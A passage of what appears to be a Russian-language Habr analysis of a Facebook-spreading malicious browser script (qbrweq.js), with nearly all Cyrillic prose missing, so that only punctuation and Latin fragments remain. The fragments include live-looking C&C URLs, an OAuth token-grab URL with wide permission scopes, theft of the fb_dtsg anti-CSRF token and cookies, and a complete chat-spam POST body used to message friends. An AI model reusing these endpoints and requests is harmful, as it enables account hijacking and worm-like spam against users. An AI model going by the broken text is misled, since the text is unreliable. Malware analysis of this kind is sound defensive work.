qbrweq.js? , Facebook-, .
, URL “www.facebook.com”, , . , uiToggle wrap, uiPopover. _5ce . , . , , Facebook .
qbrweq.js,
ajax- facebook.com, document.cookie , ANTI-CSRF- “fb_dtsg” uid . , .
URL bmw5done.info/apostime.php — php- C&C . , , json, : link type. :
{ "link": "https://dl.dropbox.com/s/o2yzr7kfewaqc1o/sa7d89as987d78a9d89s_2_2_2.htm?1241705463", "type": "aktiv" }.
link, «?», 20 , ajax- www.googleapis.com/urlshortener/v1/url . localStorage “fb_postlink”. .
ajax-api graph.facebook.com . facebook.com/ajax/typeahead/place_tag_friends.php json . json , friends_fields, 20 :
“&composertags_with[19]=<id_ >" .
20
veri, friends_fields.
, msjrandom. json, C&C, 'aktiv' 1, post_add(). “ ” + “Private Video” msjrandom, "fb_postlink". , ( veri). .
, Like, , . , , .
:
uygulamaizinver(TokenUrl("517220311745087"));
, Facebook- Facebook- id 517220311745087. TokenUrl() url -:
www.facebook.com/dialog/oauth?response_type=token&display=popup&client_id=517220311745087&redirect_uri=fbconnect://success&sso_key=com&scope=email,publish_stream,user_likes,friends_likes,user_birthday
uygulamaizinver() ajax-, html, , action . duzenlevegonder() , , , duzenlevegonder() .
Facebook , , . . .
, facebook.com, , babasker() , bmw5done.info/ag.php . php-, C&C, , API Facebook. json :
{ "link": "https://dl.dropbox.com/s/o2yzr7kfewaqc1o/sa7d89as987d78a9d89s_2_2_2.htm?1241705463", "base": "facebook.com", "okan": , "foto1": "https://graph.facebook.com/", "foto2": "/picture?type=large&width=150&height=150", "titulli": , "friends": "jo", "friendname": "jo", "type": "aktiv","web": "po" }
“type” aktiv, ajax- www.googleapis.com/urlshortener/v1 , , C&C “link”, localStorage "fb_postlink", , . qwecek() , C&C json.
AJAX-API Facebook facebook.com/ajax/chat/buddy_list.php?__a=1
id , Facebook-, configList. 20 id . c json benimesaj() , :
message_batch[0][action_type]=ma-type%3Auser-generated-message&message_batch[0][author]=fbid%3A<id__>&message_batch[0][author_email]&message_batch[0][coordinates]&message_batch[0][timestamp_time_passed]=0&message_batch[0][is_unread]=false&message_batch[0][is_cleared]=false&message_batch[0][is_forward]=false&message_batch[0][is_filtered_content]=false&message_batch[0][is_spoof_warning]=false&message_batch[0][source]=source%3Achat%3Aweb&message_batch[0][source_tags][0]=source%3Achat&message_batch[0][body]= &message_batch[0][has_attachment]=true&message_batch[0][html_body]=false&&message_batch[0][specific_to_list][0]=fbid%3A<id__online>&message_batch[0][specific_to_list][1]=fbid%3A<id__>&message_batch[0][content_attachment][subject]=IP6%20Short%20URL%20-%20Free%20service&message_batch[0][content_attachment][app_id]=2309869772&message_batch[0][content_attachment][attachment][params][urlInfo][canonical]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][urlInfo][final]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][urlInfo][user]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][favicon]=&message_batch[0][content_attachment][attachment][params][title]=<__online>jo&message_batch[0][content_attachment][attachment][params][summary]=youtube.com&message_batch[0][content_attachment][attachment][params][images][0]=https://graph.facebook.com/<id__online>/picture?type=large&width=150&height=150&message_batch[0][content_attachment][attachm...k_
metrics][images_pending]=0&message_batch[0][content_attachment][link_metrics][images_fetched]=0&message_batch[0][content_attachment][link_metrics][image_dimensions][0]=626&message_batch[0][content_attachment][link_metrics][image_dimensions][1]=293&message_batch[0][content_attachment][link_metrics][images_selected]=1&message_batch[0][content_attachment][link_metrics][images_considered]=1&message_batch[0][content_attachment][link_metrics][images_cap]=3&message_batch[0][content_attachment][link_metrics][images_type]=ranked&message_batch[0][content_attachment][composer_metrics][best_image_w]=100&message_batch[0][content_attachment][composer_metrics][best_image_h]=100&message_batch[0][content_attachment][composer_metrics][image_selected]=0&message_batch[0][content_attachment][composer_metrics][images_provided]=1&message_batch[0][content_attachment][composer_metrics][images_loaded]=1&message_batch[0][content_attachment][composer_metrics][images_shown]=1&message_batch[0][content_attachment][composer_metrics][load_duration]=4&message_batch[0][content_attachment][composer_metrics][timed_out]=0&message_batch[0][content_attachment][composer_metrics][sort_order]=&message_batch[0][content_attachment][composer_metrics][selector_type]=UIThumbPager_6&message_batch[0][ui_push_phase]=V3&message_batch[0][status]=0&client=mercury&__user=AAA&__a=1&__dyn=7n8anEAMCBynzpQ9UoGya4Cq74qbx2mbAKGiyGGEZ9LFDxCm6p_AyoSnx2&__req=f&fb_dtsg=100004008835111&ttstamp=2658172571218810680459011989&__rev=1300533 .
API facebook.com /ajax/mercury/send_messages.php?__a=1 , , .
id
localStorage okanxxxxss2 + 11e4, babasker() .
, Firefox. , .
, chrome.tabs.executeScript CSP-, //superfish.com, //ads.panoramtech.net srv1.clk-analytics.com head , CSP . , , CSP facebook.com. , . img-src object-src, facebook.com CSP .
Chrome, , - :
. ; - , .
, , .. , , - . , , , , - .
, , C&C , , , adeaditi.info
cracks4free.info.
:
support.mozilla.org/ru/questions/959873
stackoverflow.com/questions/17982902/prevent-malware-javascript-from-executing
, . , , , 2011 .
, - . Facebook . , .
SBAPI DNS, . , , , . , CSP , , img-src object-src, , , , .Source: https://habr.com/ru/post/248225/
All Articles